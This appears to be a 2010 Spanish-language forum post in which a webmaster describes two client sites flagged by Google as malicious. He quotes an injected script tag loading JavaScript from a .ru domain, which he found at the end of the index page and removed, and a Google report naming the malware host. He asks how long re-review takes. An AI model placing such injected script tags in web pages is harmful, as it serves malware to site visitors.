Gente tengo un problema, hoy me llama un cliente preocupado por que no puede entrar a dos paginas debido a que google las esta marcando como sitios peligrosos o con virus, en Firefox y Chrome me pasa eso pero en IE funciona normalmente, detecté que el problema era que en el index al final habia una linea de codigo rara mejor dicho un script
Código:
<script type="text/javascript" src="http://octopusdye.ru/Kerning.js"></script>
lo primero que hice fue borrar eso y volver a subir el archivo pero google seguia marcandola como dañina, busque por la web alguna solucion y me encontre con las herramientas para webmasters de google y me informaba lo siguiente
Código:
¿Qué ocurrió cuando Google visitó este sitio?De las 2 páginas analizadas en el sitio durante los últimos 90 días, 2 página(s) contenía(n) software malicioso que había sido descargado e instalado sin el permiso del usuario. Google visitó este sitio por última vez el 2010-08-22, y se encontró contenido sospechoso en este sitio por última vez el 2010-08-22.El software malicioso se encuentra alojado en 1 dominio(s), entre los que se incluyen pocketbloke.ru/.
This site was hosted on 1 network(s) including AS18747 (IFX).
y lo que hice fue pedir que vuelvan a revisar el sitio porque ya habian sido quitadas todas las las lineas de codigo malicioso, a lo cual me contestaron que tengo que esperar varias horas para ver el nuevo resultado.
A alguien le paso esto? va a tardar horas, o dias?, va a solucionarse el problema? y qué tengo que hacer para que no vuelva a pasar esto?
desde ya agredezco cualquier dato que me tiren